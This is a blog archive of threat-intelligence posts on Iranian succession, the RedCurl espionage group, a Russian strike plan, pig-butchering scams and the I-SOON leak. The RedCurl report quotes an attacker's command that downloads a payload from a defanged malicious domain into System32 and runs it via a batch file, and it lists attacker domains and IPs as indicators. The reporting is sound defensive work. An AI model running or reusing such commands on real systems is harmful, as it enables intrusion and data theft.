Archive for the ‘Threat Assessment’ Category

Threat Analysis: Potential Successors to the Iranian Presidency

This post was created in tandem between Scot A Terban and the Middle Eastern Intelligence Analyst created and trained by Scot A Terban.

Context

Following the recent death of Iranian President Ebrahim Raisi in a helicopter crash, there is significant speculation and maneuvering regarding his potential successors. This analysis explores the key figures likely to vie for the presidency and their potential impact on Iran’s political landscape and international relations.

Key Candidates and Succession Odds

Mohammad Mokhber
- Current Position: First Vice President of Iran
- Background: Mokhber has been named interim president following Raisi’s death. He has a strong administrative background and close ties to Supreme Leader Ali Khamenei.
- Strengths: His current position as interim president gives him a significant advantage. His loyalty to Khamenei ensures support from the hardline faction.
- Threat Level: High. Mokhber is likely to continue Raisi’s policies, including a hardline stance against the West and closer ties with Russia and China (Wikipedia) (RadioFreeEurope/RadioLiberty).
Mojtaba Khamenei
- Current Position: Influential son of Supreme Leader Ali Khamenei
- Background: Mojtaba has been groomed for leadership and holds significant influence within the Revolutionary Guard and the clerical establishment.
- Strengths: His familial connection to the Supreme Leader positions him as a powerful candidate with substantial support from the conservative establishment.
- Threat Level: Very High. Mojtaba’s succession would likely mean the continuation and possible intensification of ultraconservative policies, further entrenching the power of the Revolutionary Guard (Wikipedia) (RadioFreeEurope/RadioLiberty).
Ali Larijani
- Current Position: Former Speaker of the Parliament
- Background: Larijani is a seasoned politician with a pragmatic conservative stance. He has served in various high-profile roles, including head of the judiciary and parliament speaker.
- Strengths: His experience and relatively moderate conservative views might appeal to those seeking a less hardline approach.
- Threat Level: Medium. While Larijani could introduce some moderation, his election would still likely uphold many of the regime’s core policies, maintaining stability but not significantly altering Iran’s trajectory (ایران اینترنشنال).
Hassan Rouhani
- Current Position: Former President of Iran
- Background: Known for his moderate and reformist views, Rouhani previously held the presidency and sought to improve relations with the West through the nuclear deal.
- Strengths: Rouhani’s experience and reformist agenda could appeal to a populace weary of economic hardships and international isolation.
- Threat Level: Low to Medium. While Rouhani’s potential return could lead to more diplomatic engagement with the West, his past term’s mixed results and current political climate make his election less likely (ایران اینترنشنال).

Implications

Domestic Stability: The death of Raisi has created a power vacuum that could lead to increased factionalism within the conservative camp. This instability might result in intensified crackdowns on dissent and opposition figures as different factions vie for control.
International Relations: The election of a hardline candidate like Mokhber or Mojtaba Khamenei would likely mean continued or even increased hostility towards Western countries and closer ties with Russia and China. Conversely, a moderate candidate like Larijani or Rouhani could open the door to renewed diplomatic negotiations, although this is less likely given the current political environment.
Regional Dynamics: Iran’s policies towards regional conflicts, particularly in Yemen, Syria, and its support for groups like Hezbollah and Hamas, are unlikely to change significantly under a new hardline president. However, a moderate administration might seek to de-escalate some of these conflicts to alleviate economic pressures.

This analysis highlights the complex and potentially volatile nature of Iran’s political future in the wake of Raisi’s death. The succession battle will not only shape Iran’s internal politics but also have significant implications for regional and global stability.

Written by Krypt3ia

2024/05/20 at 17:31

Posted in Threat Assessment

TLP WHITE:

leave a comment »

Technical Threat Intelligence Report on Earth Kapre/RedCurl

Overview

Earth Kapre, also known as RedCurl, is a sophisticated cyberespionage group that has been active since at least November 2018. This group primarily targets corporate espionage, focusing on document theft from organizations across various sectors, including construction, finance, consulting, retail, insurance, and legal sectors. Their activities span several countries, notably the U.K., Germany, Canada, Norway, Russia, and Ukraine.

Tactics, Techniques, and Procedures (TTPs)

Earth Kapre/RedCurl employs a blend of custom malware and publicly available hacking tools to infiltrate target networks and exfiltrate sensitive information. Unlike many cybercriminal groups, they do not rely on ransomware or direct financial theft but instead aim to steal internal corporate documents, such as staff records, court files, and enterprise email histories. The group demonstrates exceptional red teaming skills and a keen ability to bypass traditional antivirus solutions.

Their operational timeline within a target’s network can range from two to six months from initial infection to the final stage of data theft. Their modus operandi deviates from typical cybercriminal activities by avoiding the deployment of backdoors or the use of popular post-exploitation frameworks like CobaltStrike and Meterpreter. Instead, they focus on maintaining a low profile to avoid detection while gathering valuable information.

Indicators of Compromise (IoCs)

One of their known IoCs includes the use of the domain “preston[.]melaniebest[.]com” for downloading malicious payloads, including custom versions of “curl.exe” and other utilities designed for data extraction and system manipulation. Their methodology involves sophisticated command execution sequences and registry modifications to establish persistence and evade detection.

The group also utilizes scheduled tasks for persistence and leverages common system tools in unconventional ways to execute their payloads and maintain access to compromised systems. Observations from Trend Micro MDR Threat Intelligence reveal the use of the “curl” command to fetch and execute malicious payloads, further underscoring their preference for stealth and sophistication over brute force.

Malicious Domain and IP Addresses:

preston.melaniebest[.]com
IP addresses associated with malicious activities:
- 23[.]254[.]224[.]79
- 198[.]252[.]101[.]86

Malware File Hashes:

While specific hashes were not provided in the document, any file downloaded from the listed malicious domains or IP addresses should be considered suspicious and analyzed for potential threats.

Malicious Commands and Scripts:

Use of curl.exe to download malicious payloads:
- Example command: %COMSPEC% /Q /c echo powershell -c "iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing" > \\127.0.0.1\C$\dvPqyh 2^>^&1 > %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%\KzIMnc.bat
Downloading and executing other tools like 7za.exe for unpacking or manipulating files.

Registry Keys for Persistence:

Registry modifications for persistence were outlined, involving services with unusual names and commands for execution stored within the imagepath.

Network Signatures:

Suspicious network connection checks, such as using netstat to verify if port 4419 is open, indicating potential communication with C2 servers or exfiltration attempts.

Scheduled Tasks for Execution:

Execution of scheduled tasks, often with names mimicking legitimate Windows tasks but linked to malicious activities.

Use of Impacket:

Evidence of Impacket-related services in the registry, indicating the use of this toolset for network protocol attacks and lateral movement within compromised networks.

Infrastructure and Victimology

Earth Kapre/RedCurl’s infrastructure includes a variety of compromised servers used for hosting their malicious payloads and command and control activities. Their victimology spans a broad range of sectors, with a notable focus on companies that possess valuable corporate and legal documents.

The group’s success and continued evolution suggest a trend toward more corporate-focused cyberespionage activities, potentially inspiring other cybercriminal entities to adopt similar tactics.

Conclusion

Earth Kapre/RedCurl represents a significant threat to corporations worldwide, with a unique focus on stealthy exfiltration of sensitive information rather than direct financial gain. Their sophisticated use of custom malware, combined with the strategic use of publicly available tools, makes them a formidable adversary. Organizations are advised to adopt a proactive security posture, including advanced threat detection and response capabilities, to mitigate the risk posed by such advanced persistent threats.

For more detailed information and updates on Earth Kapre/RedCurl, please refer to the comprehensive report by Trend Micro MDR Threat Intelligence.

Executive Briefing Document:

executive-threat-intel-report-redcurl Download

Threat Report: Intersection of Criminal Groups and Industrial Espionage

intersection-of-criminal-groups-and-industrial-espionage Download

Written by Krypt3ia

2024/03/17 at 14:35

Posted in Advanced Persistent Threat, Espionage, Industrial Espionage, Russia, Threat Assessment, Threat Intel, Threat Intelligence

Intelligence Report: Strategic Mobilization and Potential Unrest in Russia, May 2024

leave a comment »

LOW – MEDIUM CONFIDENCE

Executive Summary

This report analyzes a potentially burgeoning movement within Russian digital forums focused on organizing a nationwide strike in May 2024. The movement aims to destabilize the current government and challenge President Vladimir Putin’s regime through economic disruption and peaceful protest. Drawing parallels with the Euromaidan protests, participants discuss leveraging the critical timing before the U.S. presidential elections in November 2024 to catalyze change. This document assesses the potential risks, motivations, and implications of this planned action for stakeholders within and outside Russia.

Background

The discussion originates from a thread titled “Plan for Leading Russia Out of the Current Crisis,” posted on a darknet forum by a user named Leviathan. It outlines a comprehensive strategy inspired by historical precedents of peaceful resistance, suggesting a mass economic strike as a means to exert pressure on the government. The plan is set to coincide with a period perceived as opportune for action, given the upcoming U.S. elections and the current geopolitical climate.

Strategic Overview of Thread

Objectives

To initiate a nationwide strike on May 13, 2024, aiming to halt military production and economic activities.
To mobilize the population against Putin’s regime through non-violent means.
To exploit the strategic timing before the 2024 U.S. presidential elections to maximize impact.

Tactics

Coordinated cessation of work across the nation, particularly targeting sectors critical to military support and economic stability.
Dissemination of the plan through various media outlets and social channels, despite anticipated challenges in rallying support under a strict police state.
Utilization of “Italian strike” tactics, where work is performed strictly by the rules to the point of halting productivity.

Potential Risks and Threats

To the Russian Government

Economic destabilization could lead to significant financial losses, particularly in military production and state-supported sectors.
Increased public dissent may challenge the regime’s legitimacy and control, especially if the strike gains substantial participation.

To Public Safety

Although the plan advocates for peaceful protest, the potential for escalation into violence cannot be discounted, especially if met with governmental resistance.
Disruption of daily activities and essential services may result in public unrest and potential harm to civilians.

To International Relations

The strike’s timing, ahead of the U.S. presidential elections, may influence Russia’s geopolitical posture and relationships, particularly if perceived as a window of vulnerability.
External support or perceived involvement in the mobilization efforts could strain diplomatic ties and escalate tensions.

Intelligence Assessment

The planned nationwide strike represents a significant indicator of growing dissent within Russia, highlighting a strategic push towards challenging the current regime through organized, non-violent resistance. While the movement’s success is contingent on widespread support and the ability to circumvent state surveillance and suppression, it underscores a critical juncture in Russia’s socio-political landscape.

Recommendations

For Government and Law Enforcement: Monitor developments closely, with a focus on identifying peaceful protest intentions and distinguishing them from any violent escalations. Employ de-escalation tactics to manage public gatherings.
For International Stakeholders: Observe the situation for potential impacts on diplomatic relations and prepare for shifts in Russia’s internal and external policies.
For Businesses: Develop contingency plans for operations in Russia around May 2024, considering potential disruptions. Prioritize the safety of employees and ensure clear communication channels for crisis management.

Conclusion

The discussed May 2024 strike plan, surfaced in a darknet forum, suggests an attempt at civil mobilization against Putin’s regime. Currently, this information is assessed with low to medium confidence as a serious movement, primarily due to the lack of corroboration from other sources or visible rallying around this cause beyond the initial posting. While the precise outcome of such an initiative remains highly uncertain, the post itself could be indicative of simmering tensions and a segment of the population’s willingness to explore collective action for change. Given the opaque nature of the source and the forum’s environment, stakeholders are advised to maintain vigilance and prepare for various potential developments, keeping in mind the preliminary status of these discussions as the situation continues to evolve.

Downloadable Source Thread:

d0a1d0bed0bed0b1d189d0b5d0bdd0b8d0b5-leviathan-25-d184d0b5d0b2-2024-11_43-d09fd0bbd0b0d0bd-d0b2d18bd0b2d0bed0b4d0b0-d0a0d0bed181d181d0b8d0b8-d0b8d0b7-d182d0b5d0bad183d189d0b5d0b3d0be-d0b Download

Written by Krypt3ia

2024/03/13 at 14:39

Posted in Threat Assessment, Threat Intel, Threat Intelligence

TLP WHITE Threat Intelligence Report: Pig Butchering

leave a comment »

This threat intelligence report was created in tandem between Scot Terban and the ICEBREAKER intel analyst created and trained by Scot Terban.

Pig Butchering 杀猪盘

The “Pig Butchering” scam is an increasingly prevalent form of financial fraud that blends elements of romance scams, investment schemes, and cryptocurrency fraud. Originating in Southeast Asia and known as “Shāz Hū Pán” in Chinese, which literally means pig butchering, this scam involves a series of manipulative steps to defraud victims of their money by exploiting their trust and desire for profitable investments.

Background on Pig Butchering:

Origin and Early Development

The exact inception of pig butchering scams is hard to pinpoint, but they gained notable attention around the mid-2010s. Initially, these scams were localized and primarily targeted individuals in Asian countries. Scammers operated mainly through social media platforms and dating apps, where they could easily create fake profiles to initiate conversations with potential victims.

Current State

Today, pig butchering scams represent a significant and growing threat in the realm of financial fraud. They have become more diverse in their approach, targeting not just individuals looking for romantic connections but also those interested in financial investments and cryptocurrency. The scams have caused billions of dollars in losses worldwide, prompting international law enforcement agencies to take action. However, their decentralized nature, combined with the use of technology to anonymize and automate operations, makes them particularly challenging to combat.

The evolution of pig butchering scams from simple romance scams to complex financial frauds underscores the adaptability of cybercriminals and the need for continuous vigilance and education among internet users globally.

Pig Butchering Manuals on the Internet

In the shadowy corners of the internet, there exists a disturbing trend that fuels the proliferation of pig butchering scams: the availability of comprehensive manuals and guides. These documents, often found on dark web forums, encrypted messaging apps, and even in some cases on public websites, serve as step-by-step instructions for aspiring scammers. They detail methodologies for executing sophisticated financial frauds, specifically targeting individuals across the globe through social engineering tactics.

Contents of the Manuals

These manuals are disturbingly thorough, covering aspects such as:

Profile Creation: Instructions on creating believable fake profiles on social media and dating apps, including tips on selecting attractive photos and crafting compelling backstories.
Initial Contact Strategies: Scripts and conversation starters designed to initiate contact with potential victims, often tailored to different personalities and backgrounds to increase the chance of a connection.
Trust Building Techniques: Detailed guides on how to build rapport and trust over time, including how to mimic emotional intimacy and feign shared interests.
Investment Fraud Schemes: Step-by-step guides on luring victims into fake investment opportunities, including the setup of counterfeit cryptocurrency trading platforms and the illusion of profitable returns.
Handling Objections: Advice on how to counter skepticism from potential victims, including psychological tactics to overcome objections and reassure targets of the legitimacy of the investment opportunities.
Extraction and Evasion: Techniques for convincing victims to transfer funds, followed by strategies for disappearing without a trace, including how to launder money and evade law enforcement.

The Dark Marketplace

These manuals are often sold or traded in the darker parts of the internet, acting as a commodity within a marketplace that profits from the spread of fraudulent activities. Their existence highlights a professionalization of online scams, with individuals seeking to capitalize on the knowledge and tools needed to exploit others.

The existence of pig butchering manuals on the internet represents a significant challenge in the fight against online financial fraud. By understanding and addressing the root causes and distribution networks of these manuals, stakeholders can work together to reduce the impact of pig butchering scams on individuals and society.

Tactics, Techniques, and Procedures (TTPs)

Initial Contact and Trust Building: Scammers initiate contact with potential victims through various online platforms, including dating sites, social media, and messaging apps. They often create fake profiles and reach out with friendly messages, sometimes claiming to have received the victim’s contact details by mistake or posing as an old acquaintance. This phase can involve a slow build-up of trust over weeks or months, where the scammer engages in regular, personal conversation to establish a rapport.

Introduction to Investment: Once a level of trust is established, the conversation gradually shifts towards investment opportunities. Scammers present themselves as successful investors or share insider tips about lucrative investments, often involving cryptocurrencies. They promise high returns in short periods, using persuasive language and manipulated evidence to make their claims appear legitimate.

Fake Investment Platforms: Victims are then directed to download a specific app or visit a website to make their investments. These platforms are controlled by the scammers and are designed to appear legitimate, often allowing victims to see fake returns on their investments to encourage further deposits.

Increasing Investments: Scammers may allow victims to withdraw a small portion of their “profits” to build further trust. They then encourage victims to invest more money, often citing opportunities for even higher returns. At this stage, victims are deeply entangled, financially and emotionally, making it hard for them to discern the scam.

The Slaughter: When victims attempt to withdraw their funds, they find themselves unable to do so. Scammers may claim that additional taxes or fees need to be paid to access the funds. Eventually, the scammers disappear, and the victims are left with significant financial losses.

Psychological Tactics Used by Pig Butchers

Pig butchering scams exploit a range of psychological tactics designed to manipulate victims into parting with their money. Understanding these tactics can help individuals recognize and resist such scams.

Building Trust and Rapport: Scammers invest significant time in building a relationship with their victims, often posing as a romantic interest or a friend. This creates a sense of trust and lowers the victim’s defenses, making them more susceptible to suggestions of investment.

Creating a Sense of Urgency: By presenting investment opportunities as time-sensitive, scammers pressure victims to act quickly, bypassing their usual decision-making processes. This urgency discourages thorough research or consultation with others.

Providing Social Proof: Scammers may share fabricated success stories or use fake profiles to create an illusion of widespread success among investors. This tactic exploits the victim’s fear of missing out on a lucrative opportunity.

Exploiting Loneliness or Emotional Needs: By offering companionship or understanding, scammers target individuals who may be feeling lonely or emotionally vulnerable, making them more receptive to the scammer’s suggestions.

Mimicking Legitimacy: Using sophisticated fake platforms and documents, scammers create an aura of legitimacy around their investment opportunities. This makes the scam seem credible and reduces skepticism.

Open Source Intelligence (OSINT) Tactics by Pig Butchers

Pig butchering scams, known for their manipulative and deceitful approaches, often involve the use of Open Source Intelligence (OSINT) by scammers to enhance the effectiveness of their schemes. OSINT refers to the collection and analysis of information gathered from publicly available sources to support decision making. In the context of pig butchering scams, scammers leverage OSINT to gather detailed information about potential victims, tailoring their approaches to exploit specific vulnerabilities, interests, and emotional states.

Depth of OSINT Performed

Social Media Analysis: Scammers meticulously comb through potential victims’ social media profiles, extracting information about their personal interests, employment history, relationship status, and recent life events. This data allows them to craft personalized and convincing narratives, making their fraudulent propositions more appealing.

Public Record Searches: Utilizing public databases and records, scammers can uncover additional information about a target’s financial status, property ownership, and even familial connections. Such details enable a more targeted approach, including investment scams that seem tailored to the victim’s financial capabilities and interests.

Data Breach Exploitation: Scammers often exploit data from breaches that include personal information, email addresses, and passwords. By analyzing this data, they can attempt to gain unauthorized access to personal and financial accounts or use the information to bolster their credibility and trustworthiness.

Forum and Group Monitoring: By monitoring discussions in online forums and groups, especially those related to investments or cryptocurrencies, scammers identify potential targets who express interest in investment opportunities or demonstrate a lack of experience in the financial domain.

Employment and Professional Network Analysis: Professional networks like LinkedIn provide a wealth of information about a target’s career, professional skills, and network. Scammers use this information to pose as recruiters or potential business partners, offering fraudulent investment opportunities aligned with the victim’s professional interests.

Countermeasures and Awareness

To mitigate the risk of falling victim to pig butchering scams amplified by OSINT, individuals and organizations should adopt several countermeasures:

Privacy Settings: Regularly review and adjust privacy settings on all social media and professional networking platforms to limit the amount of publicly accessible information.

Awareness and Education: Stay informed about the latest scam tactics and educate friends and family on the importance of safeguarding personal information online.

Critical Evaluation: Approach unsolicited investment opportunities with skepticism, especially those received from new online contacts or those that appear too good to be true.

Use of OSINT for Self-Assessment: Periodically conduct OSINT on oneself to understand what information is publicly accessible and could potentially be used by scammers.

Reporting and Sharing: Report suspected scam activities to relevant authorities and share experiences within your network to raise awareness and prevent others from becoming victims.

By understanding the depth of OSINT performed by pig butchers and adopting appropriate countermeasures, individuals can better protect themselves against these sophisticated scams.

Counter Tactics for End Users

To counteract these psychological manipulations, end users can be taught several strategies:

Verify Independently: Always verify the identity of new online contacts independently, and be skeptical of investment opportunities shared by them. Use search engines and official websites to check the legitimacy of any investment platform.

Slow Down Decision Making: Resist the urge to make quick investment decisions, especially under pressure. Take time to research and consider the implications of any financial commitment.

Seek Second Opinions: Before making an investment based on an online acquaintance’s advice, consult with trusted friends, family, or financial advisors. A second opinion can offer a fresh perspective and identify potential red flags.

Educate About Scams: Awareness and education are powerful tools against scams. Learning about common scam tactics and indicators can help individuals recognize and avoid falling victim to them.

Use Strong Digital Hygiene: Maintain strong privacy settings on social media and be cautious about sharing personal information online. This reduces the likelihood of being targeted by scammers.

Report Suspicious Behavior: Encourage users to report any suspicious behavior or investment propositions to relevant authorities or platforms. Reporting can help prevent scammers from exploiting others.

By teaching these counter tactics, individuals can be better prepared to recognize and resist the psychological manipulations employed by pig butchering scammers.

Emerging Tactics Seen

Group Chats and Social Engineering: Scammers are evolving their strategies by using group chats to target multiple victims simultaneously. They add potential victims to fake investment chat groups, where they promote their schemes before moving to one-on-one conversations to finalize the fraud. This approach allows scammers to cast a wider net and manipulate victims more efficiently.

Prevention and Awareness

To avoid falling prey to pig butchering scams, individuals should be wary of unsolicited investment advice, especially from new online acquaintances. Verify the legitimacy of investment platforms independently and be cautious of any requirement to pay upfront fees or taxes to withdraw investment returns. Always approach online relationships and investment opportunities with skepticism, particularly if they promise guaranteed returns.

This scam highlights the importance of cybersecurity awareness and the need to be cautious when engaging with strangers online or making investments based on advice received through social media or messaging apps.

Awareness Program Outline:

pig-butchering-awareness-program-outline Download

Threat Intelligence Report Download:

tlp-white-threat-intelligence-report_-pig-butchering Download

LINKS:

Youtube: Last Week Tonight with John Oliver Show on Pig Butchering

Written by Krypt3ia

2024/02/26 at 14:37

Posted in Threat Assessment, Threat Intel, Threat Intelligence

Threat Intelligence Report & Deeper Dive: I-SOON Data Dump

This report was created in tandem between Scot Terban and the CHAIRMAN MEOW A.I. Analyst created and trained by Scot Terban

Executive Summary

This report provides a comprehensive analysis of the activities associated with I-SOON, an information security company based in China, implicated in the development and deployment of sophisticated spyware targeting various entities worldwide. Leaked documents suggest I-SOON’s involvement in state-sponsored cyber operations, including espionage against social media platforms, telecommunications companies, and other organizations. This report synthesizes available data to assess the threat I-SOON poses to global cybersecurity.

Background

I-SOON is purportedly engaged in creating offensive cyber tools and spyware on behalf of the Chinese government. The exposure of these activities comes from documents allegedly leaked on GitHub, detailing the operational capabilities of the spyware developed by I-SOON. These documents, while not officially authenticated, provide insight into China’s offensive cyber capabilities.

Capabilities

Social Media and Communication Platform Targeting: The spyware reportedly allows operators to compromise social media accounts, obtaining sensitive information such as email addresses and phone numbers, and enabling real-time monitoring and control over the accounts.
Mobile Device Targeting: I-SOON’s tools can target both Android and iOS devices, extracting a wide range of data, including hardware information, GPS locations, contact lists, media files, and real-time audio recordings.
Specialized Espionage Gadgets: The leaked documents describe devices capable of injecting spyware into targeted Android phones via WiFi signals. These gadgets are camouflaged as common electronics, such as portable batteries.
Telecommunications and Online Platform Surveillance: The spyware has been used to gather sensitive information from telecommunications providers and users of Chinese social media platforms (e.g., Weibo, Baidu, WeChat).